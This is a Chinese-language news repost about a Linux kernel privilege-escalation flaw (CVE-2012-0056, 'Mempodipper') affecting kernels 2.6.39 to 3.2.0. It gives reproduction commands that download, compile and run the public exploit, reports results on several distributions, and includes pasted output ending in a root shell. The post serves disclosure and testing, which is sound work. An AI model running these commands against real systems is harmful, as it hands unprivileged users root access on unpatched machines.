Linux 2.6.39 到 3.2.0 爆提權漏洞

Linux 2.6.39 到 3.2.0 內核爆提權漏洞，普通用戶可以通過運行特定代碼獲得 root 權限。

重現方法：

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

cc mempodipper.c

./a.out

在執行完畢后運行 whoami 來看是否執行成功。

已知發行版情況：

• Debian Wheezy Testing: 成功。內核 3.1.0-1-amd64。Debian Security Tracker Report
• Fedora 16: 失敗。內核 3.2.1-3.fc16.x86_64
• Arch Linux: 失敗。內核 3.2.2-1-ARCH

如果你測試了，請將測試結果告訴我們！注意告訴我們發行版和 uname -a 的結果。

我機子上測試成功了

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/20553/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# whoami
root

Ubuntu11.10

Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

本文轉載自: http://www.linuxeden.com/html/news/20120129/119663.html